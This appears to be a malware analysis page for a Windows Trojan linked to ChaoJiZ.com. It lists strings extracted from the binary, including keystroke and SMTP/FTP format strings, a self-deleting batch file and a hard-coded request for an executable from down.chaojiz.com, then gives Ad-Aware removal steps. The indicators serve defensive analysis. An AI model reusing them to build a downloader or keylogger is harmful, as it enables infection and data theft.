" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:8D7CB70293206811822AD538802860B2" xmpMM:DocumentID="xmp.did:C8A76F497A6711E28A59F49ABC758CF6" xmpMM:InstanceID="xmp.iid:C8A76F487A6711E28A59F49ABC758CF6" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:9EA5B885657AE211B696CBD6FE121BFB" stRef:documentID="xmp.did:8D7CB70293206811822AD538802860B2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>]
{6AEDBD6D-3FB5-418A-83A6-7F45229DC872}N.trB
.cqn$
lib\ex_ui\AttributeEditorexui.dll
Ole32.dll
GdiPlus.dll
GetAsyncKeyState
program internal error number is %d.
%s%x.tmp
:"%s"
:"%s".
.?AVCCmdTarget@@
.?AVCCmdUI@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCTestCmdUI@@
zcÁ
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
(*.htm;*.html)|*.htm;*.html
.PAVCResourceException@@
.PAVCUserException@@
.PAVCArchiveException@@
right-curly-bracket
left-curly-bracket
#include "l.chs\afxres.rc" // Standard components
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level="requireAdministrator" uiAccess="false"/> </requestedPrivileges> </security></trustInfo></assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
hXXps://VVV.verisign.com/rpa0
hXXp://ocsp.verisign.com0;
/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0
_ChaoJiZ.exe
Www.ChaoJiz.Com
@ping 127.0.0.1 -n
del Restart.bat
\Restart.bat
[email protected]
.exe|.rar|.zip|.gif|.jpg|.mp3|.rm
VBScript.RegExp
1.1 - ChaoJiZ.Com
hXXp://VVV.chaojiz.com/forum.php?mod=viewthread&tid=6
1.2.18
@%*.*f
MSWHEEL_ROLLMSG
MSVFW32.dll
AVIFIL32.dll
(*.avi)|*.avi
WPFT532.CNV
WPFT632.CNV
EXCEL32.CNV
write32.wpc
Windows Write
mswrd632.wpc
Word for Windows 6.0
wword5.cnv
Word for Windows 5.0
mswrd832.cnv
mswrd632.cnv
Word 6.0/95 for Windows & Macintosh
html32.cnv
VVV.dywt.com.cn
USER32.DLL
[%s:%d]
Range: bytes=%s-
[%s:%d]
PASS %s
PASS ******
USER %s
E:\e5\dev\e\static_link\static_libs\source\downlib\mystrlib.cpp
SIZE %s
PORT
User-Agent: %s
Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Referer: %s
Host: %s
GET %s HTTP/1.1
HTTP/1.1
Cookie: %s
%d, %s
\\192.168.0.129\TCP\1037
NSPlayer/9.0.0.2980; {%s}; Host: %srmff_fix_header: assuming data.size=%i
rmff_fix_header: assuming data.num_packets=%i
rmff_fix_header: assuming prop.num_packets=%i
rmff_fix_header: setting prop.data_offset from %i to %i
rmff_fix_header: correcting prop.num_streams from %i to %i
rmff_fix_header: correcting prop.size from %i to %i
%s %s %s
Session: %s
Cseq: %u
%*s %s
%*s %u
CSeq: %u
rtsp://%s:%i
rtsp://%s:%i/%s
ClientID: Linux_2.4_6.0.9.1235_play32_RN01_EN_586
GUID: 00000000-0000-0000-0000-000000000000
[%s:%d]
User-Agent: RealMedia Player Version 6.0.9.1235 (linux-2.0-libc6-i386-gcc2.95)
Range: npt=%s-
%s/streamid=1
%s/streamid=0
Transport: x-pn-tng/tcp;mode=play,rtp/avp/tcp;unicast;mode=play
If-Match: %s
RealChallenge2: %s, sd=%s
Title: %s
Copyright: %s
Author: %s
real: Content-length for description too big (> %uMB)!
Require: com.real.retain-entity-for-setup
SupportsMaximumASMBandwidth: 1
Bandwidth: %u
Challenge1: %s
hash output: %x %x %x %x
hash input: %x %x %x %x
stream=%u;rule=%u,
Illegal character '%c' in input.
.PAVCOleException@@
.PAVCOleDispatchException@@
GET /nwzf1.51.exe HTTP/1.1
Host: down.chaojiz.com
Referer: hXXp://down.chaojiz.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
c:\%original file name%.exe
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level="requireAdministrator" uiAccess="false"/> </requestedPrivileges> </security></trustInfo></assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
(*.*)
1.1.0.0
ChaoJiZ.Com
ChaoJiZ.Com
1.0.0.0
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:1864
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\AdrjRtbAja.ini (204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\gx[1].htm (1 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.